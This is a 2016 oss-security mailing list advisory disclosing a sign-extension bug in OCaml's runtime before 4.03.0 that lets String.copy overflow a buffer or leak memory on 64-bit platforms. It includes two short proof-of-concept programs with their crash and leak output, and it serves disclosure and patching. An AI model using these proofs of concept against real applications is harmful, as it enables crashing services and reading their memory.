Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Fri, 29 Apr 2016 00:18:22 +0000
From: Pascal Cuoq <cuoq@...st-in-soft.com>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
CC: "cve-assign@...re.org" <cve-assign@...re.org>
Subject: buffer overflow and information leak in OCaml < 4.03.0

OCaml versions 4.02.3 and earlier have a runtime bug that, on 64-bit platforms, causes sizes arguments to an internal memmove call to be sign-extended from 32 to 64-bits before being passed to the memmove function.

This leads arguments between 2GiB and 4GiB to be interpreted as larger than they are (specifically, a bit below 2^64), causing a buffer overflow.

Arguments between 4GiB and 6GiB are interpreted as 4GiB smaller than they should be, causing a possible information leak.

This commit fixes the bug: https://github.com/ocaml/ocaml/commit/659615c7b100a89eafe6253e7a5b9d84d0e8df74#diff-a97df53e3ebc59bb457191b496c90762
The function caml_bit_string is called indirectly from such functions as String.copy. String.copy for instance is supposed to be a "safe" function for which OCaml's memory safety guarantees apply.

Proof of concept:
- buffer overflow

Hexa:~ $ ocamlopt -v

The OCaml native-code compiler, version 4.00.1

Standard library directory: /usr/local/Frama-C/ocaml-4.00.1p/lib/ocaml

Hexa:~ $ cat buffer_ovflw.ml

open Printf


let s1 = String.make 0x80000003 'a';;

let () = Printf.printf "%c" s1.[1];;

let s2 = String.copy s1;;

let () = Printf.printf "%c" s2.[1];;

Hexa:~ $ ocamlopt buffer_ovflw.ml && ./a.out

Segmentation fault: 11

- information leak

Hexa:~ $ cat infoleak.ml

let s1 = String.make 0x100000003 'a';;

let () = Printf.printf "%c" s1.[1];;

let s2 = String.copy s1;;

let () =

  for i = 4 to 40 do

    Printf.printf "%2x" (Char.code s2.[i]);

  done;

  Printf.printf "\n"

;;

Hexa:~ $ ocamlopt infoleak.ml && ./a.out

a 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0


OCaml applications, compiled with OCaml 4.02.3 or earlier on a 64-bit platform, that apply the defective copy functions to untrusted inputs are at risk. These applications should be recompiled with OCaml 4.03.0.

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ